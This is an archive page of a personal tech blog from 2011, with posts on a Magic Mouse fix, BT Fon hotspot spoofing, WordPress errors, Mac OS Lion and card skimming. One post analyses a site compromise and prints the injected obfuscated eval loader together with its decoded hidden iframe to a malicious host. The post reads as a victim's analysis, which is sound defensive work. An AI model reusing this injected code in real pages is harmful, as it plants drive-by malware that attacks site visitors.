Archive for the ‘Technical’ Category

« Older Entries
Newer Entries »

TapMagic Mouse Misbehaving?

25 Feb 2012 10:01 by Rick

Is your Apple Magic Mouse behaving strangely? Mine was juddery sideways and wouldn’t move vertically at all, though the scroll was ok. I tried switching it off, back on and reconnecting but that made no difference. The fix was rather surprising. Pick it up and gently but firmly thump in back down onto the desk. Considering that the only mechanical part is the click button this is a bit odd. We call it in the trade “The drop test” and is often works because it can reseat or jiggle connectors and socketed chips but I can’t see that that applies here. Anyway, try it and see.

Posted in Mac | Comments Off on Magic Mouse Misbehaving?

TapBT Wi-Fi users beware

1 Nov 2011 14:34 by Rick

The BT broadband offering has a popular feature which allows you to access the internet from your mobile devices even when away from home. When everyone installs their Wi-Fi routers the process simultaneously sets up another Wi-Fi SSID called “BT Fon” (or sometimes “BT Openzone”, and I have seen both at once). With agreement (I think) these are configured so any BT user can sign in to them using their home account details and gain access to the internet via your connection. For privacy, identity and accounting this is kept entirely separate from the home owner’s connection and the only cost to them is a possible bandwidth reduction caused by the extra load. In practice this is a small price to pay for the ability of friends and relations to gain internet access without knowing your security code. You may get a few passers by briefly tapping your connection but they are not going to do it persistently because they have to be BT broadband customers themselves which they are paying for. It may be more of a problem if you live next to a park or café but not too serious.

This all sounds good—you are providing a service for others and in return they provide a service to you when you need it. There are millions of customers and hence millions of potential free Wi-Fi hotspots for you to use. There is security, in the form of an account and password, to verify identity which protects BT’s and the home owner’s interests.

What there is not is any security to protect the mobile user. The catch is that the Wi-Fi hot spot is only identified by it’s name (“BT Fon” or “BT Openzone”)—but anyone can create an SSID called that! So you don’t know if you are connecting to a real BT service or a fake one. This is true with any Wi-Fi hotspot of course, but much more insidious for these because of their ubiquity. There is a sign on process the first time you use one (and even that can be faked) but it is not required for subsequent connections as it is done automatically. For smart phone users it is potentially even more serious. As is pointed out in this Guardian article from April, phones sometimes connect even while in your pocket. O2 iPhones are configured to do this by default because of a partnership between O2 and BT.

BT have known about this problem for some time but have so far declined to do anything about it or even let anyone know. This is disappointing considering that their security team is one of the most respected in the industry.

Posted in Security, Technical | Comments Off on BT Wi-Fi users beware

TapEternal Flame

6 Oct 2011 16:03 by Rick

Eternal FlameThanks to XKCD.

Posted in Mac | Comments Off on Eternal Flame

Tap“PHP Fatal error: Call to undefined function get_header()” error in WordPress

25 Sep 2011 17:27 by Rick

I am getting occasional (3-4 a month) errors in a log file on the various WordPress installations that I support. The full text is

[25-Sep-2011 09:02:01] PHP Fatal error: Call to undefined function get_header() in /home/<ACCOUNT>/public_html/wp-content/themes/<THEME NAME>/index.php on line 1

Doing the natural thing I Googled for a reason but didn’t find much that was informative. Most of the cases reported were where the user had stupidly inadvertently overwritten the root index.php with the one from their theme of the day. The best I found was ardemis who is one step ahead of me.

As he implies, at important step is to stop the message reaching the user’s browser because it reveals rather too much about your web server. This is done by including the call

ini_set('display_errors', 0);

before the get_header();. This makes the message ONLY appear in the log file, which incidentally, can be found in the theme directory. He then goes on to describe a more sophisticated approach which you can read there if it suits your site. But why are they occurring? Is it search engine spiders or hackers probing the depths of your site.

Posted in Technical, WordPress | 4 Comments »

TapArguments for and against installing MacOS Lion

22 Aug 2011 09:45 by Rick

I had trouble identifying any compelling reason to install the latest version of the Apple Mac OS version nicknamed “Lion” so resorted to reading all the reviews and listing the points. It may come down to going to a store and trying it out.

Pro

Stuff that is likely to work and I would actually use.

  • The usual security and currency stuff.
  • Creation of instant folders for selected content.
  • Filevault2 encryption.
  • Mission Control (Exposé + Spaces).
  • Accented character picker.
  • Resize windows from any corner.
  • Enhancements to Preview application.
  • Signatures to PDFs (if it works with third party cameras).
  • It is cheap.

Neutral

Either things I am not interested in or don’t have the hardware to support.

  • Full-screen applications now integrated and standard. With large monitors full-screen is often a waste of space.
  • Icons are now monochrome. Probably harder to see but no big deal.
  • Launchpad—I put the Applications folder on the Dock.
  • Autosave and version control (some applications). I am not sure about this one, I don’t think I use any applications that support it.
  • Added 9 Sept: Autosave and version control only work to HFS+ formatted drives, not NAS.
  • Resume (some) applications where you left off.
  • Multi-touch gestures (I have no touch pad—should I get one?).
  • AirDrop (Mac Pro has no built in wi-fi so it won’t work).
  • Reversal of scrolling. I’ll get used to it.
  • Facetime (reported no support for third party cameras).
  • Some gestures not supported on magic mouse.
  • (Reported) side swipes are inconsistent.
  • Loss of Rosetta. I never used it.
  • Mail and Calendar enhancements (I don’t use them).
  • Added 9 Sept: Loss of Front Row (thanks Dozer).

Con

Stuff that will hinder me.

  • Loss of grid arrangement of spaces (now desktops). I race around spaces at speed using Ctrl-Arrows.
  • Desktops don’t wrap around end to start as you cycle through them.
  • Desktops are not identifiable except by content.
  • Going full screen creates a new desktop in the list.
  • Inconsistencies with dual monitor support such as full screen.
  • (Reported) difficulty using copy/paste between desktops.
  • Auto-termination of applications which are not being used.
  • Wake on mouse “wiggle” disabled (not sure if this is just for system sleep or monitor sleep as well).
  • Added 9 Sept: Loss of connection to some NAS devices (thanks Dozer). I am informed by Netgear that my ReadyNAS duo should be ok. Not sure about my LinkSys NSLU2.

At the moment the big blocker is a critical application has not yet been ported but that should be ready in a few weeks finding the time. Then…is it worth it?

Posted in Mac | 7 Comments »

TapConfused by Apple ID

6 Jul 2011 13:25 by Rick

To operate Apple equipment effectively you need an Apple ID—but the whole process is very confusing. You can login to your account in at least three places:—

They all require the same id and password but each one gives you different information and there doesn’t seem to be any way to manage the account from one place or even to move from one to the other.

But I am also confused about the concept. Are we expected to have one ID (account) each or one per family? If the former then I can’t see how we can take advantage of the offer on the app store to purchase things once and install them on multiple devices. We were better off under the old family-pack idea. What happens if some of the machines (e.g. an iMac) have multiple users who also have personal devices?

If, on the other hand, we are expected to have one per family then what happens when the kids move out (or more extreme cases like divorce)—how can they take their music and apps with them?

What if you buy/inherit second hand equipment; can you transfer the registration? And what happens if you inherit music/apps—after all they would be regarded as an asset on the estate? Or if you marry? I am reading that Apple will not merge accounts.

Does any of this really matter?

Update: 10 August. Some notice is being taken of this problem. A new development is that an Apple ID can only be associated with 10 devices (including computers) at any one time and there must be a 90 day moratorium between switching of Apple IDs on any device.

Update: 8 Sept. Another well though through commentary.

Posted in Mac | Comments Off on Confused by Apple ID

TapHacked Again

16 Jun 2011 10:01 by Rick

Since the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it but the suspicion was an out of date WordPress install which had some sort of vulnerability.

This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress but it was only one dot point off current. Never-the-less, I updated and the problem went away by wiping out the infected files. In fact, I did it so fast that I didn’t have time to investigate fully.

A week later, the problem was back and now, because I was fully up to date, I had to look more closely.

The code inserted was

[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]

which decodes to execute

document.write('[iframe src="http://esformofset.com/forum/php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"][/iframe]')

The hacked code was tacked on the end of module wp-blog-header.php so it is clear that the infection understands WordPress. Later I was informed by a regular visitor, that some other (static) pages on the site were also infected. One drawback of running a browser with full protection like Firefox with NoScript is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm and one or two others with a high page rank due to a lot of external referrers. The inserted code was after <body> and was either identical or very similar to the above (just a change of target web page).

So it is clear that the infection mechanism is clever, I just wish I know what it was. I am no longer convinced that it is anything to do with WordPress – a ZeroDay vulnerability like this would have been reported by now and, at the time of writing I can find no other internet reference to this particular infection. There is no other active content on the site so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.

Posted in Security, Technical, WordPress | 15 Comments »

TapCard Skimming

28 May 2011 07:59 by Rick

Yesterday I had my credit card skimmed in a luxury goods shop in Cabot Circus. Credit card skimming is the process used by dodgy waiters and the like to steal the details off your card for use on the black market. It is often done using a small device concealed in the palm of their hand which reads the mag stripe while walking back to the till. This scam is, in fact, dying out as there are much easier ways for the criminals to get numbers in bulk, but it still used by small time crooks.

So, what happened in the shop? They had a skimmer attached to the front of the till – I should point out here that the action of the assistant was not criminal and, I will presume that the retail chain is not either. But they are foolish. Their system requires the credit card number before it will print a receipts. The PDQ chip-and-pin terminal they use for payment is not connected to the till system, and for good reason. They have no legitimate reason to collect and store the credit card numbers. In fact, I can’t imagine what they do with them. If there is a query over the payment (if the card subsequently turns out to be stolen for instance) then the merchant account provider, the people who process the transaction, have all the information necessary to pursue the case.

Larger retailers like supermarkets do have their systems connected together. They are operating as their own merchant provider and communicate directly with the credit card companies but they are then required to meet much more stringent security requirements on their whole system.

So if you see this happening – complain. I only noticed because the mag stripe on my card is faulty (it “accidentally” got too close to a strong magnet) and they had to type the number in by hand. It is also worth while noting the three digit number on the back of your card and then covering it up with a sticker. That will hinder online fraud.

I will report back here if the managing director of the chain concerned replies.

Posted in Security | 3 Comments »

TapNeoOffice is no longer free

20 Apr 2011 10:45 by Rick

NeoOffice is a fork of the well known office suite OpenOffice.org customised for Mac OS X. When it was created there was no Mac version of OpenOffice and even when I started three years ago, the Mac support for OpenOffice was very poor. There have always been licence anomalies between the two versions—OpenOffice is LGPL and requires a copyright assignment for contributions to the main code. NeoOffice were not prepared to do this so their code is licensed under full GPL and is not retrofitted.

Up until now, it has always been free at source with a recommendation/plea for donations to support the work, which I have done at least once. Now, since Version 3.2, the “donation” is mandatory—you can’t download the code unless you have donated at least $10US within the last year.

Times have changed—it now requires Mac OS X 10.5+ and Intel hardware which must kill off a sizeable proportion of their customer base. Also OpenOffice and now LibreOffice are much more capable. Finally, if you must pay for it, the iWorks components are much more affordable and also offer cross format capabilities.

Posted in Mac | Comments Off on NeoOffice is no longer free

TapHow incompetent can a software company be

10 Feb 2011 09:15 by Rick

I mean, of course, Adobe. I have written before about the hoops you need to go through to get copies of their critical security upgrades for the Flash products. Now they have cut off one of the little ruses I used so that it is now no longer possible to download the upgrade for Internet Explorer. All you get is flashax.exe, which is self deleting as soon as you run it (how stupid is that) and only runs an “Adobe Installation Helper” which downloads and runs the real product. Not a lot of help if you are not connected to the internet at the time. One of my systems will not be upgraded this time around because it can’t due to a firewall—perhaps I should sue for consequent damage when it gets infected.

Now all this fiddling about would perhaps make sense if the product was hundreds of MB and a download needed to continue if interrupted. But it is 2.7MB and takes a few seconds to download and a few more to install. What we want is an upgrade that we can download and save to run later and one that does all situations in one go – not separate for IE and other browsers.

[12 Feb—they’ve fixed it now]

Posted in Security, Technical | Comments Off on How incompetent can a software company be

« Older Entries
Newer Entries »

^ Top